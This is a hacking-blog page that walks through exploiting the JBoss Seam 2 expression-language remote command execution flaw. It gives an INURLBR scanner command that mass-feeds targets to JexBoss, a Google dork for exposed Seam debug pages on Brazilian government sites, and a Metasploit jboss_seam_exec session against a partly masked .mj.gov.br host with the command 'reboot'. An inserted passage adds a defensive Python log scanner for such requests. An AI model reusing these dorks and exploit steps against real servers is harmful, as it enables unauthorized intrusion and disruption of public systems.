<span style="color: red; font-family: "courier new" , "courier" , monospace; line-height: 25.6000003814697px;">php inurlbr.php --range-rand '150'</span><span style="color: red; font-family: "courier new" , "courier" , monospace; line-height: 25.6000003814697px;"> -s output.txt -q all --unique --command-all "python JexBoss</span><span style="color: red; font-family: "courier new" , "courier" , monospace; line-height: 25.6000003814697px;">.py _TARGET_"</span><br />
<br />
<b><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large;">Example output:</span></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaqTYxCnkg4di-kmPYCmGlQpt1MDesxOsaew6CfLsaPr__nqvCkdN67TFCDB5dhPdKdVwDdKVpPMxa5UlzpztpWzxCOIZF9k8ybLY5Ub9dYLfVCphKp3807oC4ZRvcRcMbzOERIE0Ahjea/s1600/Captura+de+tela+de+2015-06-19+16%253A36%253A42.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaqTYxCnkg4di-kmPYCmGlQpt1MDesxOsaew6CfLsaPr__nqvCkdN67TFCDB5dhPdKdVwDdKVpPMxa5UlzpztpWzxCOIZF9k8ybLY5Ub9dYLfVCphKp3807oC4ZRvcRcMbzOERIE0Ahjea/s640/Captura+de+tela+de+2015-06-19+16%253A36%253A42.png" width="640" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
Posted by InurlBR (http://www.blogger.com/profile/12688503833321390298)<br />
<br />
<b>JBoss Seam 2 Remote Command Execution - Metasploit</b> (published 2015-06-19)<br />
<div style="text-align: center;">
<h3>
JBoss Seam 2 Remote Command Execution - Metasploit</h3>
</div>
<div style="text-align: center;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAwkI8w4gDgm8GJrBX94MNl7M_GDbjMBOkZz4PcaC7uQqCK2N7kYHpPoONcMIVCtG3gY50_TWfKoFb8GiqksVRVDIKq3jGuI4KzOwMFy7iseij20fdNKeEBcC2fPUNumj1jKJ-0hwj6Vw/s1600/Critical+vulnerability+in+JBoss+Application+Servers+enables+remote+Shell.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="JBoss Seam 2 (jboss-seam2), as used in JBoss Enterprise Application Platform 4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression Language (EL) expressions, which allows remote attackers to execute arbitrary code via a crafted URL. This modules also has been tested successfully against IBM WebSphere 6.1 running on iSeries. NOTE: this is only a vulnerability when the Java Security Manager is not properly configured." border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAwkI8w4gDgm8GJrBX94MNl7M_GDbjMBOkZz4PcaC7uQqCK2N7kYHpPoONcMIVCtG3gY50_TWfKoFb8GiqksVRVDIKq3jGuI4KzOwMFy7iseij20fdNKeEBcC2fPUNumj1jKJ-0hwj6Vw/s1600/Critical+vulnerability+in+JBoss+Application+Servers+enables+remote+Shell.png" title="JBoss Seam 2 (jboss-seam2), as used in JBoss Enterprise Application Platform 4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression Language (EL) expressions, which allows remote attackers to execute arbitrary code via a crafted URL. This modules also has been tested successfully against IBM WebSphere 6.1 running on iSeries. NOTE: this is only a vulnerability when the Java Security Manager is not properly configured." width="400" /></a></div>
<br /></div>
<div>
JBoss Seam 2 (jboss-seam2), as used in JBoss Enterprise Application Platform 4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression Language (EL) expressions, which allows remote attackers to execute arbitrary code via a crafted URL. This module has also been tested successfully against IBM WebSphere 6.1 running on iSeries. NOTE: this is only a vulnerability when the Java Security Manager is not properly configured.</div>
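<div>
Added example, written from the defender's side (it is not part of the original post, of the Metasploit module, or of the INURLBR scanner): a small Python log scanner that flags what the description above implies an attack looks like on the wire, namely requests to <span style="font-family: Courier New, Courier, monospace;">.seam</span> resources whose query string carries EL delimiters (<span style="font-family: Courier New, Courier, monospace;">#{</span> or <span style="font-family: Courier New, Courier, monospace;">${</span>), including single- and double-URL-encoded forms, and also reports exposed Seam debug pages of the kind the dork below searches for. The access-log lines are constructed sample data in combined log format; the severity labels and the "debug" path heuristic are assumptions.</div>

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format). They are not taken
# from the post: the IPs are documentation ranges and the paths are placeholders.
SAMPLE_LOG = """\
203.0.113.10 - - [19/Jun/2015:14:47:01 -0300] "GET /app/home.seam HTTP/1.1" 200 5120
203.0.113.10 - - [19/Jun/2015:14:47:05 -0300] "GET /app/home.seam?cid=42 HTTP/1.1" 200 5120
198.51.100.7 - - [19/Jun/2015:14:48:10 -0300] "GET /app/home.seam?x=%23%7Bexpression%7D HTTP/1.1" 500 311
198.51.100.7 - - [19/Jun/2015:14:48:12 -0300] "GET /app/home.seam?a=%2523%257Bx%257D HTTP/1.1" 500 311
198.51.100.7 - - [19/Jun/2015:14:48:20 -0300] "GET /app/debug.seam HTTP/1.1" 200 8812
192.0.2.25 - - [19/Jun/2015:14:49:00 -0300] "GET /static/logo.png?v=%23%7Bfoo%7D HTTP/1.1" 200 2048
"""

# Combined log format: ip ident user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# JBoss/JSF EL expressions are delimited by #{...}; ${...} is the JSP EL form.
EL_RE = re.compile(r'[#$]\{')


def decode_fully(value, rounds=3):
    """URL-decode repeatedly so a double-encoded %2523%257B still reveals '#{'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_line(line):
    """Split one access-log line into its fields; None if it is not in the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # partition() rather than urlsplit(): a raw '#' must stay in the query,
    # not be treated as a fragment.
    path, _, query = m.group('target').partition('?')
    return {
        'ip': m.group('ip'),
        'ts': m.group('ts'),
        'method': m.group('method'),
        'path': path,
        'query': decode_fully(query),
        'status': int(m.group('status')),
    }


def classify(entry):
    """Assumed severity scheme: EL delimiters hitting a .seam endpoint is the
    pattern the post describes; an exposed debug page is exposure, not an
    attack; EL delimiters elsewhere are worth a look but lower priority."""
    is_seam = entry['path'].lower().endswith('.seam')
    has_el = bool(EL_RE.search(entry['query'])) or bool(
        EL_RE.search(decode_fully(entry['path'])))
    if is_seam and has_el:
        return 'high'
    if is_seam and 'debug' in entry['path'].lower():
        return 'medium'
    if has_el:
        return 'low'
    return None


def scan_log(text):
    """Return (severity, ip, path, decoded_query) for every suspicious request."""
    findings = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        sev = classify(entry)
        if sev:
            findings.append((sev, entry['ip'], entry['path'], entry['query']))
    return findings


if __name__ == '__main__':
    for sev, ip, path, query in scan_log(SAMPLE_LOG):
        print(f'{sev:6} {ip:15} {path} ?{query}')
```

The decoded query is kept in the finding so an analyst sees the delimiter even when the original request was double-encoded. On a real deployment the findings feed a SIEM rule; the post's own note that the issue only applies when the Java Security Manager is not properly configured means the log hit should be correlated with the server's Security Manager state before treating it as a confirmed compromise.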
<div>
</div>
<ul>
<li><span style="font-size: large;"><b>MODULE METASPLOIT:</b></span><span style="color: red; font-family: 'Courier New', Courier, monospace;">auxiliary/admin/http/jboss_seam_exec</span></li>
</ul>
<div>
</div>
<ul>
<li><span style="font-size: large;"><b>COMMAND SCANNER INURLBR:</b></span><span style="color: red; font-family: 'Courier New', Courier, monospace;">/inurlbr.php --dork 'site:.gov.br inurl:.seam' -s jboss.txt -q 1,6</span></li>
</ul>
<div>
</div>
<ul>
<li><span style="font-size: large;"><b>DORK:</b></span><span style="color: red; font-family: Courier New, Courier, monospace;">site:.gov.br inurl:.seam intitle:"JBoss Seam Debug"</span></li>
</ul>
<div>
<span style="font-size: large;"><b>Configuration:</b></span></div>
<ul>
<li><b>CMD - <span style="color: red;">The command to execute.</span></b></li>
<li><b>RHOST - <span style="color: red;">The target address</span></b></li>
<li><b>RPORT - <span style="color: red;">The target port</span></b></li>
<li><b>TARGETURI - <span style="color: red;">Target URI</span></b></li>
</ul>
<div>
<span style="font-family: Courier New, Courier, monospace;">msf > use auxiliary/admin/http/jboss_seam_exec</span></div>
<span style="font-family: Courier New, Courier, monospace;">msf auxiliary(<span style="color: red;"><b>jboss_seam_exec</b></span>) > set RHOST *******.mj.gov.br</span><br />
<div>
<span style="font-family: Courier New, Courier, monospace;">msf auxiliary(<span style="color: red;"><b>jboss_seam_exec</b></span>) > set RPORT 80</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">msf auxiliary(<span style="color: red;"><b>jboss_seam_exec</b></span>) > set CMD reboot</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">msf auxiliary(<span style="color: red;"><b>jboss_seam_exec</b></span>) > set TARGETURI /******/home.seam</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">msf auxiliary(<b><span style="color: red;">jboss_seam_exec</span></b>) > exploit<br /><br /><b>Output:</b></span></div>
<div class="separator" style="clear: both;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxjtAl2DtnAlBj6WxWM7Btx5VBvOIno1VBG7csHvlHtxso3ii6mKLrIv4AuYmzpDbblxAOrYB0tbvkwTpHqT8SjXHLmi81oWHgIdDiS2Mxq_c0ijdIh0Fure_frxrS8kP8mFY-fBgf4Sw/s1600/ssss.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="msf > use auxiliary/admin/http/jboss_seam_exec msf auxiliary(jboss_seam_exec) > set RHOST *******.mj.gov.br msf auxiliary(jboss_seam_exec) > set RPORT 80 msf auxiliary(jboss_seam_exec) > set CMD reboot msf auxiliary(jboss_seam_exec) > set TARGETURI /******/home.seam msf auxiliary(jboss_seam_exec) > exploit" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxjtAl2DtnAlBj6WxWM7Btx5VBvOIno1VBG7csHvlHtxso3ii6mKLrIv4AuYmzpDbblxAOrYB0tbvkwTpHqT8SjXHLmi81oWHgIdDiS2Mxq_c0ijdIh0Fure_frxrS8kP8mFY-fBgf4Sw/s1600/ssss.png" title="msf > use auxiliary/admin/http/jboss_seam_exec msf auxiliary(jboss_seam_exec) > set RHOST *******.mj.gov.br msf auxiliary(jboss_seam_exec) > set RPORT 80 msf auxiliary(jboss_seam_exec) > set CMD reboot msf auxiliary(jboss_seam_exec) > set TARGETURI /******/home.seam msf auxiliary(jboss_seam_exec) > exploit" /></a></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div>
<span style="font-size: large;">Result:</span></div>
<div>
<br /></div>
<div class="separator" style="clear: both;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIhzelY2wME2KR-N47HcKML8MvB1E07oI3NAyNgtwep-D4-BimS4vMqeIYRs23QEWo3d4NIxjoJQOKN0oPZpHNwRMx0tr2Ng7kMZ120ZJob9GbDl0UI0tN9AaBV-MYDBQvMpMCQxpLd3U/s1600/xssss.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Resultado:" border="0" height="116" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIhzelY2wME2KR-N47HcKML8MvB1E07oI3NAyNgtwep-D4-BimS4vMqeIYRs23QEWo3d4NIxjoJQOKN0oPZpHNwRMx0tr2Ng7kMZ120ZJob9GbDl0UI0tN9AaBV-MYDBQvMpMCQxpLd3U/s1600/xssss.png" title="Resultado:" width="640" /></a></div>
<div>
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 1; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="color: #6aa84f;"><span style="font-size: large;">VIDEO</span><span style="font-size: large;">:</span></span><b><br />
<iframe allowfullscreen="" frameborder="0" height="450" src="https://www.youtube.com/embed/DSKqhh8TD80" width="100%"></iframe>
<br /><br /><br /><span style="color: lime;">REFERENCE</span>:</b> <a href="http://www.rapid7.com/db/modules/auxiliary/admin/http/jboss_seam_exec">http://www.rapid7.com/db/modules/auxiliary/admin/http/jboss_seam_exec</a><br />
<b><span style="color: lime;">SCANNER INURLBR:</span></b> <a href="http://github.com/googleinurl/SCANNER-INURLBR">http://github.com/googleinurl/SCANNER-INURLBR</a></div>
</div>Unknownnoreply@blogger.com0